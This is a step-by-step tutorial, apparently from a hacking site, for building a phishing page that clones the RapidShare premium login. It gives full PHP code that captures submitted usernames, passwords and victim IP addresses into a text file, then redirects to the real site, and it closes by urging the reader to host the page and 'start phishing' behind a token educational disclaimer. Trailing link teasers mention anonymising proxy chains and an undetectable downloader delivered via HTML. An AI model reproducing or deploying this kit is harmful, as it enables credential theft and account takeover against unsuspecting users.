1.You can use this same tut for anything else…

2. Go to

http://www.rapidshare.com

and navigate to the premium account log-in screen at the url :

https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi

3. We will now begin to make our phisher. Start by right clicking on the page and click view source.

4. Select all and paste into a notepad document.

5. You should see a bunch of random html coding, but we are only interested in two words: method and action.

6. Do a search in the document for the word “method” (without quotes).

7. Your result should be something like : method=”post”

8. Change the word post to the word get.

9. Now do a search for the word “action” (without quotes). action is usually very close to method so you may not even have to do a search for it.

10. You should see something like this: action=”

https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”

11. Where the url in between the quotes is, replace the text with next.php so the new part says: action=”next.php”

12. Save this file as index.html and create a new document on notepad.

13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.

14. Copy and paste this code into the notepad document:

<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER[‘REMOTE_ADDR’];
header(“Location: Put your REDIRECT URL Here”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:

<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER[‘REMOTE_ADDR’];
header(“Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>

16. Save this file as next.php and open up a new notepad document.

17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen(”password.txt”, “a”);
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.

18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.

19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.

credits to the author watchdog

This is for educational purposes only.

Explore More

Kaspersky’s support website hacked!

Hard to digest, but true. The leading anti-virus website provider Kaspersky’s support website got hacked and details are published at this blog. Kasperksy admitted that it’s their fault and blamed

Anonymous Connections Over the Internet – Using Socks Chains Proxy Proxies

IntroductionThis tutorial is an attempt to help you re-route all internet winsock applications in ms windows trough a socks chain, thus making your connections much more anonymous.TheoryThe more different hops

Infection via HTML

Edit the code on what and how you need it, and yes this is detectable  in many cases, but you could insert a small FUD downloader to be  downloaded via